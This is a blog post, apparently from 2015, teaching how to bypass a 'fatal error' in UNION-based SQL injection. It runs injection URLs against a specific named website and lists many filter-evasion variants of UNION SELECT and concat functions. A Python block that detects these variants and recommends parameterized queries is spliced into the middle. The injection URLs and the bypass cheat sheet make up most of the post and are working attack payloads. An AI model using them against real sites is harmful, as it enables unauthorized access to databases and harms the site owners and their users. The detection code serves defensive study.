Friday, April 17, 2015

Bypass UNION SELECT FATAL ERROR







Have you ever come across something that looks like this:




This happened to me during a UNION SELECT, but don't worry, friends. Let's look at how to get past it, hehehe..

I have a target whose UNION SELECT returns a fatal error:

http://wwfa.org.uk/article.php?id=-174+union+select+1,2,3,4,5,6,7,8--   ( Fatal error )

To get past that fatal error, we do the following:

http://wwfa.org.uk/article.php?id=-174+union+select+1,2,3,4,5,6,7,8-- ( Fatal error )

Change the numbers to null one at a time, in order, like this:

http://wwfa.org.uk/article.php?id=-174 UNION SELECT null,2,3,4,5,6,7,8-- ( Error )
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,null,3,4,5,6,7,8-- ( Error )
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,null,4,5,6,7,8-- ( Error )
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,null,5,6,7,8-- ( Error )
http://wwfa.org.uk/article.php?id=-174 UNION SELECT 1,2,3,4,null,6,7,8-- ( the magic number appears )

That's really all there is to it, hehehe..

Here are a few assorted bypasses:

Union Select bypassing :


+--+Union+--+Select+--+

+#uNiOn+#sEleCt+
+union+distinct+select+
+union+distinctROW+select+
+union%23aa%0Aselect+
0%a0union%a0select%09
%0Aunion%0Aselect%0A
+UnIoN+SeLselectECT+

/%2A%2A/union/%2A%2A/select/%2A%2A/

%2f%2a*/UNION%2f%2a*/SELECT%2f%2a*/
+%2F**%2Funion%2F**%2Fselect+

+UnIoN/*&a=*/SeLeCT/*&a=*/


+%0A%0D/*!%0A%0Dunion*/+%0A%0D/*!50000Select*/%0A%0D

/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ 
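
Seen from the filtering side, the variants above reduce to the same two keywords once the value is URL-decoded and MySQL comments are removed. The following is an added example, not code from the original post: a Python check that normalizes a parameter value before matching, run over strings copied from the list plus a few constructed ones. All function and variable names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)  # MySQL executes the body of /*!50000 ... */
BLOCK = re.compile(r"/\*.*?\*/", re.S)            # ordinary /* ... */ comment
LINE = re.compile(r"(?:--|#)[^\n]*")              # -- or # comment, up to the newline
# \w*select also matches a nested keyword such as "SeLselectECT".
UNION_SELECT = re.compile(r"\bunion\s+(?:(?:all|distinct|distinctrow)\s+)?\w*select")

def decode(raw, max_rounds=3):
    """URL-decode repeatedly so double encoding (%252f) is unwrapped as well."""
    for _ in range(max_rounds):
        step = unquote_plus(raw, encoding="latin-1")  # latin-1 turns %a0 into NBSP
        if step == raw:
            break
        raw = step
    return raw

def views(raw):
    """Two normalized forms: line comments removed, and only their markers removed."""
    s = VERSIONED.sub(r" \1 ", decode(raw))
    s = BLOCK.sub(" ", s)
    comments_removed = LINE.sub(" ", s)
    markers_removed = re.sub(r"--|#", " ", s)  # in case filter and database disagree
    return [re.sub(r"\s+", " ", v).strip().lower()
            for v in (comments_removed, markers_removed)]

def is_union_select(raw):
    return any(UNION_SELECT.search(v) for v in views(raw))

# Copied from the list above.
PAGE_SAMPLES = [
    "+--+Union+--+Select+--+",
    "+union+distinctROW+select+",
    "+union%23aa%0Aselect+",
    "0%a0union%a0select%09",
    "+UnIoN+SeLselectECT+",
    "/%2A%2A/union/%2A%2A/select/%2A%2A/",
    "+UnIoN/*&a=*/SeLeCT/*&a=*/",
    "/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/",
]
# Constructed for this example: one double-encoded value and two harmless ones.
DOUBLE_ENCODED = "1%2520union%2520select%25201"
BENIGN = ["174", "news+from+the+students+union"]

if __name__ == "__main__":
    for value in PAGE_SAMPLES + [DOUBLE_ENCODED] + BENIGN:
        print(is_union_select(value), value)
```

A match here is a detection signal for logs or a request filter; the `id` parameter itself is fixed by binding it in a parameterized query.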

Concat bypassing :


group_concat()

grOUp_ConCat(/*!*/,0x3e,/*!*/)
group_concat(,0x3c62723e)
g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29 

CoNcAt()

concat()
CoNcAt()
CONCAT(DISTINCT )
concat(0x3a,,0x3c62723e)
/*!50000cOnCat*/

concat_ws()

concat_ws(0x3a,)
CONCAT_WS(CHAR(32,58,32),version(),) 

REVERSE(tacnoc)


binary(version())


uncompress(compress(version()))


aes_decrypt(aes_encrypt(version(),1),1) 





 


OK, thank you, I hope this is useful ^_^ .

By : Ahmad Fathony